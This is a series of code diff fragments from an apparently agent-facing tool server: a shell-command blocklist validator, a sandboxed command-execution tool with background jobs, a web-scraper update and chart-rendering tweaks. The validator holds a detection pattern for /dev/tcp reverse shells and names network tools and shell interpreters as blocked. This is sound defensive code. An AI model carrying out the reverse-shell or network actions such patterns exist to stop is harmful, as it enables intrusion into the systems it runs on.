    re.compile(r">&\s*/dev/tcp", re.IGNORECASE),
]

# Shell operators used to split compound commands.
# We check each segment individually against _BLOCKED_EXECUTABLES.
_SHELL_SPLIT_PATTERN = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")
def _normalize_executable_name(token: str) -> str:
"""Normalize executable names for matching (e.g. cmd.exe -> cmd)."""
normalized = token.lower().strip("\"'")
normalized = re.split(r"[\\/]", normalized)[-1]
if normalized.endswith(".exe"):
return normalized[:-4]
return normalized
def _extract_executable(segment: str) -> str:
    """Return the normalized executable name for one command segment.

    Leading environment-variable assignments (``VAR=value``) are skipped
    so that ``FOO=bar wget ...`` still resolves to ``wget``. Returns the
    empty string for a blank segment.
    """
    for token in segment.strip().split():
        # NAME=value tokens are env assignments, not the executable.
        # Option tokens (starting with '-') are never assignments.
        if "=" in token and not token.startswith("-"):
            continue
        return _normalize_executable_name(token)
    return ""
def validate_command(command: str) -> None:
    """Validate a command string against the safety blocklists.

    Args:
        command: The shell command string to validate.

    Raises:
        CommandBlockedError: If the command matches any blocked pattern.
    """
    if not command or not command.strip():
        return

    stripped = command.strip()

    # --- Check full-command patterns ---
    for pattern in _BLOCKED_PATTERNS:
        match = pattern.search(stripped)
        if match:
            raise CommandBlockedError(
                f"Command blocked for safety: matched dangerous pattern '{match.group()}'. "
                f"If this is a false positive, please modify the command."
            )

    # --- Check each segment for blocked executables ---
    # Hoisted: the blocklist is a module constant, so build the set once
    # instead of rebuilding it (twice) for every segment.
    blocked = set(_BLOCKED_EXECUTABLES)
    for segment in _SHELL_SPLIT_PATTERN.split(stripped):
        segment = segment.strip()
        if not segment:
            continue

        executable = _extract_executable(segment)
        # Check exact match and prefix-before-dot (e.g. mkfs.ext4 -> mkfs)
        names_to_check = {executable}
        if "." in executable:
            names_to_check.add(executable.split(".")[0])

        hits = names_to_check & blocked
        if hits:
            raise CommandBlockedError(
                f"Command blocked for safety: '{hits.pop()}' is not allowed. "
                f"Blocked categories: network tools, privilege escalation, "
                f"system destructive commands, shell interpreters."
            )
@@ -1,152 +0,0 @@
# Execute Command Tool
Executes shell commands within the secure session sandbox.
## Description
The `execute_command_tool` allows you to run arbitrary shell commands in a sandboxed environment. Commands are executed with a 60-second timeout and capture both stdout and stderr output.
## Use Cases
- Running build commands (npm build, make, etc.)
- Executing tests
- Running linters or formatters
- Performing git operations
- Installing dependencies
## Usage
```python
execute_command_tool(
command="npm install",
workspace_id="workspace-123",
agent_id="agent-456",
session_id="session-789",
cwd="project"
)
```
## Arguments
| Argument | Type | Required | Default | Description |
|----------|------|----------|---------|-------------|
| `command` | str | Yes | - | The shell command to execute |
| `workspace_id` | str | Yes | - | The ID of the workspace |
| `agent_id` | str | Yes | - | The ID of the agent |
| `session_id` | str | Yes | - | The ID of the current session |
| `cwd` | str | No | "." | The working directory for the command (relative to session root) |
## Returns
Returns a dictionary with the following structure:
**Success:**
```python
{
"success": True,
"command": "npm install",
"return_code": 0,
"stdout": "added 42 packages in 3s",
"stderr": "",
"cwd": "project"
}
```
**Command failure (non-zero exit):**
```python
{
"success": True, # Command executed successfully, but exited with error code
"command": "npm test",
"return_code": 1,
"stdout": "",
"stderr": "Error: Tests failed",
"cwd": "."
}
```
**Timeout:**
```python
{
"error": "Command timed out after 60 seconds"
}
```
**Error:**
```python
{
"error": "Failed to execute command: [error message]"
}
```
## Error Handling
- Returns an error dict if the command times out (60 second limit)
- Returns an error dict if the command cannot be executed
- Returns success with non-zero return_code if command runs but fails
- Commands are executed in a sandboxed session environment
- Working directory defaults to session root if not specified
## Security Considerations
- Commands are executed within the session sandbox only
- File access is restricted to the session directory
- Network access depends on sandbox configuration
- Commands run with the permissions of the session user
- Use with caution as shell injection is possible
## Examples
### Running a build command
```python
result = execute_command_tool(
command="npm run build",
workspace_id="ws-1",
agent_id="agent-1",
session_id="session-1",
cwd="frontend"
)
# Returns: {"success": True, "return_code": 0, "stdout": "Build complete", ...}
```
### Running tests with output
```python
result = execute_command_tool(
command="pytest -v",
workspace_id="ws-1",
agent_id="agent-1",
session_id="session-1"
)
# Returns: {"success": True, "return_code": 0, "stdout": "test output...", "stderr": ""}
```
### Handling command failures
```python
result = execute_command_tool(
command="nonexistent-command",
workspace_id="ws-1",
agent_id="agent-1",
session_id="session-1"
)
# Returns: {"success": True, "return_code": 127, "stderr": "command not found", ...}
```
### Running git commands
```python
result = execute_command_tool(
command="git status",
workspace_id="ws-1",
agent_id="agent-1",
session_id="session-1",
cwd="repo"
)
# Returns: {"success": True, "return_code": 0, "stdout": "On branch main...", ...}
```
## Notes
- 60-second timeout for all commands
- Commands are executed using shell=True (supports pipes, redirects, etc.)
- Both stdout and stderr are captured separately
- Return code 0 typically indicates success
- Working directory is created if it doesn't exist
- Command output is returned as text (UTF-8 encoding)
@@ -1,3 +0,0 @@
from .execute_command_tool import register_tools
__all__ = ["register_tools"]
@@ -1,211 +0,0 @@
"""In-process registry of long-running shell jobs spawned by
``execute_command_tool(run_in_background=True)``.
Jobs are keyed on a short id the tool returns to the agent. The agent
can then call ``bash_output(id=...)`` to poll for new output and
``bash_kill(id=...)`` to terminate. Each job is scoped to an
``agent_id`` so two agents sharing the same MCP server can't see or
kill each other's work.
The stdout/stderr buffers are bounded rolling tail buffers (64 KB each)
so a runaway process can't exhaust memory. Older bytes are dropped with
a one-time ``[truncated N bytes]`` marker prepended to the returned
text.
"""
from __future__ import annotations
import asyncio
import time
from collections import deque
from dataclasses import dataclass, field
from uuid import uuid4
# 64 KB rolling window per stream. Large enough for long build logs,
# small enough that a bash infinite loop can't OOM the MCP process.
_MAX_BUFFER_BYTES = 64 * 1024
@dataclass
class _RingBuffer:
"""Append-only byte buffer with a hard byte ceiling and per-read
offset tracking so each bash_output call only returns new bytes.
"""
max_bytes: int = _MAX_BUFFER_BYTES
# deque of (global_offset, bytes) chunks. global_offset is the total
# bytes written prior to this chunk; lets us compute "bytes since
# last poll" without copying.
_chunks: deque[tuple[int, bytes]] = field(default_factory=deque)
_total_written: int = 0
_total_dropped: int = 0
_read_cursor: int = 0
def write(self, data: bytes) -> None:
if not data:
return
self._chunks.append((self._total_written, data))
self._total_written += len(data)
# Evict from the front until we're under the ceiling.
current_bytes = sum(len(c) for _, c in self._chunks)
while current_bytes > self.max_bytes and self._chunks:
dropped_offset, dropped = self._chunks.popleft()
self._total_dropped += len(dropped)
current_bytes -= len(dropped)
# Push the read cursor forward if the reader was still
# pointing at bytes we just evicted.
if self._read_cursor < dropped_offset + len(dropped):
self._read_cursor = dropped_offset + len(dropped)
def read_new(self) -> str:
"""Return any bytes since the last call, as decoded text.
Includes a ``[truncated N bytes]`` prefix if rolling-window
eviction dropped any bytes the reader hadn't yet consumed.
"""
chunks_out: list[bytes] = []
cursor = self._read_cursor
for offset, chunk in self._chunks:
end = offset + len(chunk)
if end <= cursor:
continue
start_in_chunk = max(0, cursor - offset)
chunks_out.append(chunk[start_in_chunk:])
cursor = end
self._read_cursor = cursor
raw = b"".join(chunks_out)
text = raw.decode("utf-8", errors="replace")
# Surface eviction ONCE per poll so the agent knows to check
# the file system for larger logs instead of assuming it's got
# the full output.
if self._total_dropped > 0 and text:
text = f"[truncated {self._total_dropped} earlier bytes]\n" + text
return text
@dataclass
class BackgroundJob:
    """One live (or recently exited) background shell job plus its
    rolling output buffers. Jobs are scoped to a single agent via
    ``agent_id``.
    """

    id: str
    agent_id: str
    command: str
    cwd: str
    started_at: float
    process: asyncio.subprocess.Process
    stdout_buf: _RingBuffer = field(default_factory=_RingBuffer)
    stderr_buf: _RingBuffer = field(default_factory=_RingBuffer)
    _pump_task: asyncio.Task | None = None
    exit_code: int | None = None

    def status(self) -> str:
        """Human-readable state: ``running`` or ``exited(N)``."""
        if self.exit_code is not None:
            return f"exited({self.exit_code})"
        rc = self.process.returncode
        if rc is not None:
            # Finished, but the pump hasn't recorded exit_code yet.
            return f"exited({rc})"
        return "running"
# agent_id -> {job_id -> BackgroundJob}
_jobs: dict[str, dict[str, BackgroundJob]] = {}
# Guards all reads/writes of _jobs so concurrent tool calls can't race.
_jobs_lock = asyncio.Lock()
def _short_id() -> str:
return uuid4().hex[:8]
async def _pump(job: BackgroundJob) -> None:
    """Drain the child process's stdout/stderr into the ring buffers."""

    async def _copy(stream: asyncio.StreamReader | None, sink: _RingBuffer) -> None:
        # A stream can be None if the pipe wasn't requested.
        if stream is None:
            return
        # read() returns b"" at EOF, which ends the loop.
        while chunk := await stream.read(4096):
            sink.write(chunk)

    proc = job.process
    await asyncio.gather(
        _copy(proc.stdout, job.stdout_buf),
        _copy(proc.stderr, job.stderr_buf),
    )
    job.exit_code = await proc.wait()
async def spawn(command: str, cwd: str, agent_id: str) -> BackgroundJob:
    """Launch *command* as a background subprocess and register the job.

    The caller holds the returned job's id and can poll via ``get()``
    or stop it via ``kill()``.
    """
    process = await asyncio.create_subprocess_shell(
        command,
        cwd=cwd,
        stdout=asyncio.subprocess.PIPE,
        stderr=asyncio.subprocess.PIPE,
    )
    job = BackgroundJob(
        id=_short_id(),
        agent_id=agent_id,
        command=command,
        cwd=cwd,
        started_at=time.time(),
        process=process,
    )
    # Start pumping IO immediately so the ring buffers stay warm even
    # if the agent doesn't poll for a while.
    job._pump_task = asyncio.create_task(_pump(job))
    async with _jobs_lock:
        _jobs.setdefault(agent_id, {})[job.id] = job
    return job
async def get(agent_id: str, job_id: str) -> BackgroundJob | None:
    """Look up a job by id within the agent's scope; None if absent."""
    async with _jobs_lock:
        agent_jobs = _jobs.get(agent_id)
        if agent_jobs is None:
            return None
        return agent_jobs.get(job_id)
async def kill(agent_id: str, job_id: str, grace_seconds: float = 3.0) -> str:
    """SIGTERM a background job, escalating to SIGKILL after a grace
    period. Returns a human-readable status string.

    Args:
        agent_id: Scope owner of the job (jobs are per-agent).
        job_id: Id returned by ``spawn``.
        grace_seconds: How long to wait after SIGTERM before SIGKILL.

    Returns:
        One of: "no background job with id ...", "already exited with
        code N", "terminated cleanly (exit=N)", or "killed (SIGKILL,
        exit=N)". The job is deregistered in every found case.
    """
    job = await get(agent_id, job_id)
    if job is None:
        return f"no background job with id '{job_id}'"

    if job.process.returncode is not None:
        status = f"already exited with code {job.process.returncode}"
    else:
        try:
            job.process.terminate()
        except ProcessLookupError:
            # Process died between the returncode check and terminate().
            pass
        try:
            await asyncio.wait_for(job.process.wait(), timeout=grace_seconds)
            status = f"terminated cleanly (exit={job.process.returncode})"
        except TimeoutError:
            # Grace period expired — escalate to SIGKILL.
            try:
                job.process.kill()
            except ProcessLookupError:
                pass
            # Unconditional wait: reaps the child so it doesn't zombie.
            await job.process.wait()
            status = f"killed (SIGKILL, exit={job.process.returncode})"

    # Deregister after kill so the id is no longer reachable.
    async with _jobs_lock:
        scope = _jobs.get(agent_id)
        if scope is not None:
            scope.pop(job_id, None)
    return status
async def clear_agent(agent_id: str) -> None:
    """Test hook: kill every job owned by ``agent_id``."""
    async with _jobs_lock:
        evicted = _jobs.pop(agent_id, {})
        for job in evicted.values():
            # Skip jobs that have already exited.
            if job.process.returncode is not None:
                continue
            try:
                job.process.kill()
            except ProcessLookupError:
                pass
            await job.process.wait()
@@ -1,222 +0,0 @@
"""Shell command execution tool.
Three tools are registered:
* ``execute_command_tool`` runs a command synchronously with a per-call
timeout (default 120s, max 600s). Uses ``asyncio.create_subprocess_shell``
so the MCP event loop is not blocked while the child runs.
* ``bash_output`` polls a background job started with
``execute_command_tool(run_in_background=True)`` and returns any new
stdout/stderr since the last poll plus the current status.
* ``bash_kill`` terminates a background job (SIGTERM then SIGKILL after
a 3-second grace period).
All three go through the same pre-execution safety blocklist in
``command_sanitizer.py``.
"""
from __future__ import annotations
import asyncio
import os
import time
from mcp.server.fastmcp import FastMCP
from ..command_sanitizer import CommandBlockedError, validate_command
from ..security import AGENT_SANDBOXES_DIR, get_sandboxed_path
from .background_jobs import get as get_job, kill as kill_job, spawn as spawn_job
# Bounds on per-call timeout. 1s minimum prevents accidental zeros that
# would cause every command to fail. 600s maximum (10 min) is the same
# ceiling Claude Code uses for its Bash tool; builds and test suites
# longer than that should use run_in_background instead.
_MIN_TIMEOUT = 1
_MAX_TIMEOUT = 600
# Default wall-clock budget (seconds) when the caller omits timeout_seconds.
_DEFAULT_TIMEOUT = 120
def _resolve_cwd(cwd: str | None, agent_id: str) -> str:
    """Map an agent-relative cwd onto the sandbox filesystem.

    Ensures the agent's sandbox root exists, then resolves *cwd* inside
    it; an empty/None cwd falls back to the root itself.
    """
    agent_root = os.path.join(AGENT_SANDBOXES_DIR, agent_id, "current")
    os.makedirs(agent_root, exist_ok=True)
    return get_sandboxed_path(cwd, agent_id) if cwd else agent_root
def register_tools(mcp: FastMCP) -> None:
    """Register command execution tools with the MCP server.

    Registers three tools: ``execute_command_tool`` (foreground or
    background shell execution), ``bash_output`` (poll a background
    job), and ``bash_kill`` (terminate a background job).
    """

    @mcp.tool()
    async def execute_command_tool(
        command: str,
        agent_id: str,
        cwd: str | None = None,
        timeout_seconds: int = _DEFAULT_TIMEOUT,
        run_in_background: bool = False,
    ) -> dict:
        """
        Purpose
            Execute a shell command within the agent sandbox.

        When to use
            Run validators, linters, builds, test suites
            Generate derived artifacts (indexes, summaries)
            Perform controlled maintenance tasks
            Start long-running processes via ``run_in_background=True``
            (dev servers, watchers, file-triggered builds)

        Rules & Constraints
            No network access unless explicitly allowed
            No destructive commands (rm -rf, system modification)
            Commands are validated against a safety blocklist before
            execution. The blocklist runs through shell=True, so it
            only prevents explicit nested shell executables.
            timeout_seconds is clamped to [1, 600]. For longer-running
            work use run_in_background=True + bash_output to poll.

        Args:
            command: The shell command to execute.
            agent_id: The ID of the agent (auto-injected).
            cwd: Working directory for the command (relative to the
                agent sandbox). Defaults to the sandbox root.
            timeout_seconds: Max wall-clock seconds the foreground
                command is allowed to run. Ignored when
                run_in_background=True. Default 120, max 600.
            run_in_background: If True, spawn the command and return
                immediately with a job id. Use bash_output(id=...) to
                read output and bash_kill(id=...) to stop it.

        Returns:
            For foreground commands: dict with stdout, stderr, return_code,
            elapsed_seconds.
            For background commands: dict with id, pid, started_at, and
            instructions for polling / killing the job.
            On error: dict with an "error" key.
        """
        # Safety gate first: refuse blocked commands before touching the FS.
        try:
            validate_command(command)
        except CommandBlockedError as e:
            return {"error": f"Command blocked: {e}", "blocked": True}

        try:
            secure_cwd = _resolve_cwd(cwd, agent_id)
        except Exception as e:
            return {"error": f"Failed to resolve cwd: {e}"}

        if run_in_background:
            try:
                job = await spawn_job(command, secure_cwd, agent_id)
            except Exception as e:
                return {"error": f"Failed to spawn background job: {e}"}
            return {
                "success": True,
                "background": True,
                "id": job.id,
                "pid": job.process.pid,
                "command": command,
                "cwd": cwd or ".",
                "started_at": job.started_at,
                "hint": (
                    "Background job started. Call "
                    f"bash_output(id='{job.id}') to read output, or "
                    f"bash_kill(id='{job.id}') to terminate it."
                ),
            }

        # Foreground path: clamp timeout, spawn, wait with a watchdog.
        try:
            timeout = max(_MIN_TIMEOUT, min(_MAX_TIMEOUT, int(timeout_seconds)))
        except (TypeError, ValueError):
            timeout = _DEFAULT_TIMEOUT

        started = time.monotonic()
        try:
            proc = await asyncio.create_subprocess_shell(
                command,
                cwd=secure_cwd,
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE,
            )
        except Exception as e:
            return {"error": f"Failed to execute command: {e}"}

        try:
            stdout_b, stderr_b = await asyncio.wait_for(proc.communicate(), timeout=timeout)
        except TimeoutError:
            # Child is still running: kill it, drain what it already
            # wrote so the agent gets a partial log, then report.
            try:
                proc.kill()
            except ProcessLookupError:
                pass
            try:
                stdout_b, stderr_b = await asyncio.wait_for(proc.communicate(), timeout=2.0)
            except Exception:
                # Was `except (TimeoutError, Exception)`; TimeoutError is
                # already an Exception subclass, so the tuple was redundant.
                stdout_b, stderr_b = b"", b""
            elapsed = round(time.monotonic() - started, 2)
            return {
                "error": (
                    f"Command timed out after {timeout} seconds. "
                    f"For longer work pass timeout_seconds (max 600) or "
                    f"run_in_background=True."
                ),
                "timed_out": True,
                "elapsed_seconds": elapsed,
                "stdout": stdout_b.decode("utf-8", errors="replace"),
                "stderr": stderr_b.decode("utf-8", errors="replace"),
            }
        except Exception as e:
            return {"error": f"Failed while running command: {e}"}

        return {
            "success": True,
            "command": command,
            "return_code": proc.returncode,
            "stdout": stdout_b.decode("utf-8", errors="replace"),
            "stderr": stderr_b.decode("utf-8", errors="replace"),
            "cwd": cwd or ".",
            "elapsed_seconds": round(time.monotonic() - started, 2),
        }

    @mcp.tool()
    async def bash_output(id: str, agent_id: str) -> dict:
        """Poll a background command for new output and its current status.

        Returns any stdout/stderr bytes written since the last call.
        The status is "running" or "exited(N)". Finished jobs stay in
        the registry until bash_kill deregisters them.

        Args:
            id: The job id returned from
                execute_command_tool(run_in_background=True).
            agent_id: The ID of the agent (auto-injected).
        """
        job = await get_job(agent_id, id)
        if job is None:
            return {"error": f"no background job with id '{id}'"}
        new_stdout = job.stdout_buf.read_new()
        new_stderr = job.stderr_buf.read_new()
        return {
            "id": id,
            "status": job.status(),
            "stdout": new_stdout,
            "stderr": new_stderr,
            "elapsed_seconds": round(time.time() - job.started_at, 2),
        }

    @mcp.tool()
    async def bash_kill(id: str, agent_id: str) -> dict:
        """Terminate a background command.

        Sends SIGTERM, waits up to 3 seconds, then escalates to SIGKILL
        if the process is still alive. The job id is then deregistered.

        Args:
            id: The job id returned from
                execute_command_tool(run_in_background=True).
            agent_id: The ID of the agent (auto-injected).
        """
        status = await kill_job(agent_id, id)
        return {"id": id, "status": status}
@@ -10,12 +10,14 @@ Validates URLs against internal network ranges to prevent SSRF attacks.
from __future__ import annotations
import ipaddress
import json
import re
import socket
from typing import Any
from urllib.parse import urljoin, urlparse
from urllib.robotparser import RobotFileParser
from bs4 import BeautifulSoup
from bs4 import BeautifulSoup, NavigableString
from fastmcp import FastMCP
from playwright.async_api import (
Error as PlaywrightError,
@@ -82,6 +84,7 @@ def register_tools(mcp: FastMCP) -> None:
selector: str | None = None,
include_links: bool = False,
max_length: int = 50000,
offset: int = 0,
respect_robots_txt: bool = True,
) -> dict:
"""
@@ -94,12 +97,18 @@ def register_tools(mcp: FastMCP) -> None:
Args:
url: URL of the webpage to scrape
selector: CSS selector to target specific content (e.g., 'article', '.main-content')
include_links: Include extracted links in the response
max_length: Maximum length of extracted text (1000-500000)
include_links: When True, links are inlined as `[text](url)` in
content and also returned as a `links` list
max_length: Maximum length of extracted text returned in this call (1000-500000)
offset: Character offset into the extracted text. Use with
`next_offset` from a prior truncated result to paginate.
respect_robots_txt: Whether to respect robots.txt rules (default True)
Returns:
Dict with scraped content (url, title, description, content, length) or error dict
Dict with: url, final_url, title, description, page_type
(article|listing|page), content, length, offset, total_length,
truncated, next_offset, headings, structured_data (json_ld + open_graph),
and optionally links. On error, returns {"error": str, ...} with a hint when applicable.
"""
try:
# Validate URL
@@ -128,6 +137,7 @@ def register_tools(mcp: FastMCP) -> None:
"error": f"Blocked by robots.txt: {url}",
"url": url,
"skipped": True,
"hint": ("Pass respect_robots_txt=False if you have authorization to scrape this site."),
}
except Exception:
pass # If robots.txt can't be fetched, proceed anyway
@@ -195,7 +205,17 @@ def register_tools(mcp: FastMCP) -> None:
return {"error": "Navigation failed: no response received"}
if response.status != 200:
return {"error": f"HTTP {response.status}: Failed to fetch URL"}
hint = (
"Site likely requires auth, blocks bots, or is rate-limiting."
if response.status in (401, 403, 429)
else "Resource may not exist or server may be down."
)
return {
"error": f"HTTP {response.status}: Failed to fetch URL",
"url": url,
"status": response.status,
"hint": hint,
}
content_type = response.headers.get("content-type", "").lower()
if not any(t in content_type for t in ["text/html", "application/xhtml+xml"]):
@@ -218,63 +238,176 @@ def register_tools(mcp: FastMCP) -> None:
# Parse rendered HTML with BeautifulSoup
soup = BeautifulSoup(html_content, "html.parser")
base_url = str(response.url) # Final URL after redirects
# Extract structured data BEFORE noise removal — JSON-LD lives
# in <script>, which gets decomposed below. JSON-LD is often the
# cleanest source of structured info on listing pages.
json_ld: list[Any] = []
for script in soup.find_all("script", type="application/ld+json"):
raw = script.string or script.get_text() or ""
if raw.strip():
try:
json_ld.append(json.loads(raw))
except (json.JSONDecodeError, TypeError):
pass
open_graph: dict[str, str] = {}
for meta in soup.find_all("meta"):
prop = (meta.get("property") or "").strip()
if prop.startswith("og:"):
val = (meta.get("content") or "").strip()
if val:
open_graph[prop[3:]] = val
# Remove noise elements
for tag in soup(["script", "style", "nav", "footer", "header", "aside", "noscript", "iframe"]):
tag.decompose()
# Get title and description
# Get title and description (fall back to OG description)
title = soup.title.get_text(strip=True) if soup.title else ""
description = ""
meta_desc = soup.find("meta", attrs={"name": "description"})
if meta_desc:
description = meta_desc.get("content", "")
description = meta_desc.get("content", "") or ""
if not description:
description = open_graph.get("description", "")
# Target content
# Headings outline (capped) — lets the agent drill in via selector
headings: list[dict[str, Any]] = []
for h in soup.find_all(["h1", "h2", "h3", "h4", "h5", "h6"]):
h_text = h.get_text(strip=True)
if h_text:
headings.append({"level": int(h.name[1]), "text": h_text})
if len(headings) >= 100:
break
# Page-type heuristic: many <article> blocks → listing page
article_count = len(soup.find_all("article"))
if article_count >= 3:
page_type = "listing"
elif article_count == 1 or soup.find("main"):
page_type = "article"
else:
page_type = "page"
# Locate target subtree
if selector:
content_elem = soup.select_one(selector)
if not content_elem:
return {"error": f"No elements found matching selector: {selector}"}
text = content_elem.get_text(separator=" ", strip=True)
return {
"error": f"No elements found matching selector: {selector}",
"url": url,
"hint": "Try a broader selector or omit selector to use auto-detection.",
}
else:
# Auto-detect main content
main_content = (
soup.find("article")
or soup.find("main")
# Prefer <main> over the first <article> — on listing pages
# the latter would drop every article after the first.
content_elem = (
soup.find("main")
or soup.find(attrs={"role": "main"})
or soup.find("article")
or soup.find(class_=["content", "post", "entry", "article-body"])
or soup.find("body")
)
text = main_content.get_text(separator=" ", strip=True) if main_content else ""
# Clean up whitespace
text = " ".join(text.split())
# Collect link metadata BEFORE rewriting anchors (rewriting
# replaces <a> elements with NavigableStrings, so find_all('a')
# would miss them after).
links: list[dict[str, str]] = []
if content_elem and include_links:
for a in content_elem.find_all("a", href=True)[:50]:
link_text = a.get_text(strip=True)
href = urljoin(base_url, a["href"])
if link_text and href:
links.append({"text": link_text, "href": href})
# Truncate if needed (reserve 3 chars for the ellipsis so the
# final string stays within max_length)
if len(text) > max_length:
text = text[: max_length - 3] + "..."
text = ""
if content_elem:
# Inline anchors as [text](url) so links survive text
# extraction (otherwise the agent has to correlate `links`
# against the text blob).
if include_links:
for a in content_elem.find_all("a", href=True):
link_text = a.get_text(strip=True)
if link_text:
href = urljoin(base_url, a["href"])
a.replace_with(NavigableString(f"[{link_text}]({href})"))
# Convert <br> and block elements into newlines so the output
# preserves paragraph/list/heading structure rather than
# collapsing into one giant whitespace-joined string.
for br in content_elem.find_all("br"):
br.replace_with(NavigableString("\n"))
block_tags = (
"p",
"h1",
"h2",
"h3",
"h4",
"h5",
"h6",
"li",
"tr",
"div",
"section",
"article",
"blockquote",
)
for block in content_elem.find_all(block_tags):
block.insert_before(NavigableString("\n"))
block.append(NavigableString("\n"))
raw_text = content_elem.get_text(separator=" ")
# Normalize: squash spaces within each line, collapse runs of
# blank lines to a single blank, trim.
cleaned: list[str] = []
blank = True # swallow leading blanks
for line in raw_text.split("\n"):
line = re.sub(r"[ \t]+", " ", line).strip()
if line:
cleaned.append(line)
blank = False
elif not blank:
cleaned.append("")
blank = True
text = "\n".join(cleaned).strip()
# Apply offset/truncation with continuation metadata. Reserve 3
# chars for the ellipsis so the returned string stays within
# max_length (back-compat with existing test expectations).
total_length = len(text)
offset = max(0, min(offset, total_length))
end = offset + max_length
truncated = end < total_length
sliced = text[offset:end]
if truncated and len(sliced) >= 3:
sliced = sliced[:-3] + "..."
structured_data: dict[str, Any] = {}
if json_ld:
structured_data["json_ld"] = json_ld
if open_graph:
structured_data["open_graph"] = open_graph
result: dict[str, Any] = {
"url": url,
"final_url": base_url,
"title": title,
"description": description,
"content": text,
"length": len(text),
"page_type": page_type,
"content": sliced,
"length": len(sliced),
"offset": offset,
"total_length": total_length,
"truncated": truncated,
"next_offset": end if truncated else None,
"headings": headings,
}
# Extract links if requested
if structured_data:
result["structured_data"] = structured_data
if include_links:
links: list[dict[str, str]] = []
base_url = str(response.url) # Use final URL after redirects
for a in soup.find_all("a", href=True)[:50]:
href = a["href"]
# Convert relative URLs to absolute URLs
absolute_href = urljoin(base_url, href)
link_text = a.get_text(strip=True)
if link_text and absolute_href:
links.append({"text": link_text, "href": absolute_href})
result["links"] = links
return result
+1 -5
View File
@@ -29,11 +29,7 @@ def register_chart_tools(mcp: FastMCP) -> list[str]:
register_tools(mcp)
return [
name
for name in mcp._tool_manager._tools.keys()
if name.startswith("chart_")
]
return [name for name in mcp._tool_manager._tools.keys() if name.startswith("chart_")]
__all__ = ["register_chart_tools"]
+48 -3
View File
@@ -247,9 +247,7 @@ async def _render_in_page(
# expected to have already coerced JSON-string specs into dicts
# in chart_tools/tools.py — this is a defense-in-depth check.
if isinstance(spec, str):
raise RendererError(
"spec arrived as a string; it should have been parsed to a dict in chart_render"
)
raise RendererError("spec arrived as a string; it should have been parsed to a dict in chart_render")
try:
json.dumps(spec)
except (TypeError, ValueError) as exc:
@@ -273,13 +271,60 @@ async def _render_in_page(
// data points are missing (the 2026-05-01 "all data
// points are gone" bug). We don't need animation in
// a static PNG anyway.
//
// Disjoint-region layout policy. ECharts has no auto-
// layout for component overlap (verified against the
// option reference): title/legend/grid are absolutely
// positioned and ignore each other. We enforce three
// non-overlapping regions:
// - Title: anchored to TOP (top:16, no bottom)
// - Legend: anchored to BOTTOM (bottom:16, no top)
// except when orient:'vertical' (side legend)
// - Grid: middle, with containLabel for axis labels
// Strips user-supplied vertical positions so an agent
// spec like `legend.top:"8%"` (which lands inside the
// title at chat-bubble dimensions — the 2026-05-01
// bug) can't collide. Horizontal anchoring (left/right)
// is preserved so e.g. left-aligned legends still work.
// Other fields (text, data, formatter, etc.) win as
// normal via Object.assign — grid keeps the middle position.
const userTitle = option.title || {};
const userLegend = option.legend;
const userGrid = option.grid || {};
const legendVertical = userLegend && userLegend.orient === 'vertical';
const stripV = (o) => {
const c = Object.assign({}, o);
delete c.top; delete c.bottom; return c;
};
const sanitized = Object.assign({}, option, {
animation: false,
animationDuration: 0,
animationDurationUpdate: 0,
animationEasing: 'linear',
animationEasingUpdate: 'linear',
title: Object.assign({left: 'center'}, stripV(userTitle), {top: 16}),
grid: Object.assign({left: 56, right: 56}, stripV(userGrid), {
// Force vertical bounds — user-supplied grid.top /
// grid.bottom (often percentage strings like "8%"
// that the agent picks at default dimensions) don't
// generalize across chat-bubble sizes. Bottom must
// clear bottom-anchored legend (~36px) plus xAxis
// name (containLabel handles tick labels but NOT
// axis names; that's outerBoundsMode in v6+, we're
// on v5). 96 with legend, 40 without.
top: 64,
bottom: userLegend && !legendVertical ? 96 : 40,
containLabel: true,
}),
});
if (userLegend) {
const legendDefaults = {
icon: 'roundRect', itemWidth: 12, itemHeight: 12, itemGap: 16,
};
sanitized.legend = legendVertical
? Object.assign(legendDefaults, userLegend)
: Object.assign(legendDefaults, stripV(userLegend), {bottom: 16});
}
// Signal "render complete" via window.__chartReady so
// the Python side knows when it's safe to screenshot.
+7 -8
View File
@@ -119,15 +119,15 @@ def build_theme(theme: str = "light") -> dict:
"axisTick": {"show": False},
"axisLabel": {"color": fg_muted, "fontSize": 11, "margin": 14},
"splitLine": {"lineStyle": {"color": grid_line, "type": "dashed"}},
# Y-axis name vertically-centered on the axis instead of
# floating in the upper-left corner where it competes with
# the title and legend.
"nameLocation": "middle",
"nameGap": 44,
"nameTextStyle": {"color": fg_muted, "fontSize": 12, "fontWeight": 500},
"nameRotate": 90,
# Don't auto-rotate value-axis names — the theme can't tell
# xAxis (horizontal-bar) from yAxis (vertical-bar). Rotating
# both at 90° vertical-mounts the xAxis name on horizontal-
# bar charts and it collides with the legend (peer_val
# regression). Specs set nameRotate explicitly when needed.
},
# Same for log/time/etc. — keep the look consistent.
"logAxis": {
"axisLine": {"show": False},
"axisLabel": {"color": fg_muted, "fontSize": 11},
@@ -135,7 +135,6 @@ def build_theme(theme: str = "light") -> dict:
"nameLocation": "middle",
"nameGap": 44,
"nameTextStyle": {"color": fg_muted, "fontSize": 12, "fontWeight": 500},
"nameRotate": 90,
},
"timeAxis": {
"axisLine": {"show": True, "lineStyle": {"color": axis_line}},
@@ -169,8 +168,8 @@ def build_theme(theme: str = "light") -> dict:
# being CSS-hello-world green/red.
"candlestick": {
"itemStyle": {
"color": "#3d7a4a", # up body
"color0": "#a8453d", # down body
"color": "#3d7a4a", # up body
"color0": "#a8453d", # down body
"borderColor": "#3d7a4a",
"borderColor0": "#a8453d",
},
+1 -3
View File
@@ -174,9 +174,7 @@ def register_tools(mcp: FastMCP) -> None:
# browser-side flakes. We retry once for the latter; if
# the second attempt fails too, surface the error so the
# agent can fix it.
logger.warning(
"chart_render attempt %d/%d failed: %s", attempt + 1, 2, exc
)
logger.warning("chart_render attempt %d/%d failed: %s", attempt + 1, 2, exc)
if attempt == 0:
await asyncio.sleep(0.15)
continue
+1 -1
View File
@@ -41,7 +41,7 @@ def register_tools(mcp: FastMCP) -> None:
"""Register all GCU browser tools with the MCP server.
Tools are organized into categories:
- Lifecycle: browser_start, browser_stop, browser_status
- Lifecycle: browser_setup, browser_status, browser_stop (browser_open lazy-creates the context)
- Tabs: browser_tabs, browser_open, browser_close, browser_activate_tab
- Navigation: browser_navigate, browser_go_back, browser_go_forward, browser_reload
- Inspection: browser_screenshot, browser_snapshot, browser_console
+2 -2
View File
